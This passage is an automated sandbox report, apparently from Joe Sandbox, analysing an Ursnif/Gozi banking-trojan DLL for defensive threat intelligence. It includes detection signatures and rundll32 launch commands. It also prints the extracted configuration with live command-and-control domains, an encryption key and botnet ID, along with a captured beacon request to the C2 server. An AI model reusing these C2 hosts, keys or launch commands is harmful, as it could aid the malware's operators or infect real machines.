Analysis Report SecuriteInfo.com..7135.20767

Overview

General Information

Sample Name: SecuriteInfo.com..7135.20767 (renamed file extension from 20767 to dll)
Analysis ID: 432910
MD5: 5ba7ac7fa4f9e831679832b6cc22aee8
SHA1: 813df24ac22c2666b28bc3e7fb9bd1eef2a7f395
SHA256: d2c19ac3eace29239bf919c442556abf782da5953325ee6b2626482fbf442f29
Tags: dll, Gozi

Detection

Ursnif
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4712 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6116 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5328 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 68 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4604 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 4456 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq | Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000003.323666044.0000000002AB0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: authd.feronok.com | Virustotal: Detection: 11%
Source: SecuriteInfo.com..7135.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com..7135.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll
Source: Joe Sandbox View | ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: global traffic | HTTP traffic detected: GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: authd.feronok.com
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: authd.feronok.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 10 Jun 2021 20:50:54 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.dr | String found in binary or memory: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
Source: loaddll32.exe, 00000000.00000002.460078435.000000000073B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2485 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1B9C GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1EC7 NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2485 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2264
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2237EA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23F1F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23D7C5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23DFD2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E224510
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E291D40
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E237200
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23A216
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E221010
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2308E5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E22A9D3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2264
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2237EA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23F1F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23D7C5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23DFD2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E224510
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E291D40
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E237200
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23A216
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E221010
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2308E5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E22A9D3
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E220F70 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E220F70 appears 31 times
Source: SecuriteInfo.com..7135.dll | Binary or memory string: OriginalFilenameSon.dll8 vs SecuriteInfo.com..7135.dll
Source: SecuriteInfo.com..7135.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine | Classification label: mal76.troj.winDLL@12/13@1/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF00D3A9B95DF089AC.TMP
Source: SecuriteInfo.com..7135.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com..7135.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2200 push ecx; ret 0_2_6E1C2209
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2253 push ecx; ret 0_2_6E1C2263
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E220FB5 push ecx; ret 0_2_6E220FC8
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D0B16 pushad ; iretd 0_2_6E1D0B17
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1CEBB5 pushfd ; iretd 0_2_6E1CEC0C
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D2807 pushad ; retf 0_2_6E1D2809
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D10D4 push 04853024h; retf 0_2_6E1D10DB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2200 push ecx; ret 4_2_6E1C2209
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2253 push ecx; ret 4_2_6E1C2263
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E220FB5 push ecx; ret 4_2_6E220FC8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D0B16 pushad ; iretd 4_2_6E1D0B17
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1CEBB5 pushfd ; iretd 4_2_6E1CEC0C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D2807 pushad ; retf 4_2_6E1D2809
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D10D4 push 04853024h; retf 4_2_6E1D10DB

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E297188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2970BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E296CC5 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E297188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2970BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E296CC5 push dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225139 GetProcessHeap
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225EA1 SetUnhandledExceptionFilter
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225EA1 SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E1C1E8A
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22E72D
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22E438
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22E4B5
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22E538
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,0_2_6E22ED13
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,0_2_6E22ED99
Source: C:\Windows\System32\loaddll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6E22FA7E
Source: C:\Windows\System32\loaddll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6E223BC0
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,0_2_6E22E3DC
Source: C:\Windows\System32\loaddll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E22E857
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,0_2_6E22E904
Source: C:\Windows\System32\loaddll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6E22E168
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6E1C1E8A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_6E22E72D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,4_2_6E22E438
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,4_2_6E22E4B5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_6E22E538
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,4_2_6E22ED13
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,4_2_6E22ED99
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6E22FA7E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_6E223BC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,4_2_6E22E3DC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6E22E857
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,4_2_6E22E904
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,4_2_6E22E168
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1C7D SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

